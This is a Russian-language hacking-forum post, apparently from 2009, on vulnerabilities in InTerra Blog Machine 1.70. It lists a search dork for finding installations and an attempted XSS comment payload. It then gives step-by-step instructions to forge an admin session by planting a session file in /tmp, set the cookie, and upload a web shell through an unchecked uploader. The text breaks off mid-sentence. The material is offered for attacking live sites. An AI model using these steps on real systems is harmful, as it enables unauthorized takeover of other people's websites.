Уязвимости InTerra Blog Machine

Discussion in 'Веб-уязвимости' started by Dimi4, 7 Jan 2009.

  1. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,045
    Reputations:
    291
    Уязвимости InTerra Blog Machine
    Name : InTerra Blog Machine
    Site : Dull.ru
    Version : 1.70
    Dork : "Powered by InTerra Blog Machine"


    Существует хсс, но "раскрутить" до конца не получается, так как жестко фильтруется:
    lib\safehtml\classes\safehtml.php

    PHP:
      // dangerous protocols
      
    var $BlackProtocols = array("javascript""vbscript""about""wysiwyg""data""view-source""ms-its""mhtml""shell""lynxexec""lynxcgi""hcp""ms-help""help""disk""vnd.ms.radio""opera""res""resource""chrome""mocha""livescript", );
    Вообщем вот до чего дошол: (Добавление комент.)
    Code:
    <a href=`http://xek.comd" onclick='overflow'><i>wtf?<a style='font-size:30px; color:red;'>hekked</a></i>
    А всё потому, что в actions\addcomment.php
    PHP:
                    //prepare contents
                    
    $comment strip_tags($_POST['comment'],"<a>,<i>,<b>");
    Разрешины три тэги, но клас safehtml всё отрубает. Просьба кто будет смотреть присмотреться к етой хсс, возможна ли она там вообще.

    Авторизация. Подмена сесии.

    Всё гениально: :D

    PHP:
        //check access
        
    if(!$_SESSION['admin']){
            
    header("Location: " SERVER_ROOT);
            exit;
        } 
    Собственно идем в /tmp
    создаем сесию, права 0777:

    sess_aaec41a3b692b6be0dc292e40b778595
    Code:
    admin|b:1;
    Ну и вбиваем куку в браузере.
    После авторизации
    И заливаем шелл. Проверки нет :)
    lib\uploader.class.php
    PHP:
            function copyFile($name,$destination){
                if(!
    $result move_uploaded_file($name,$destination)){
                    
    $result copy($name,$destination);
                }
                return 
    $result
            }
    Грузится в
     
    3 people like this.
Loading...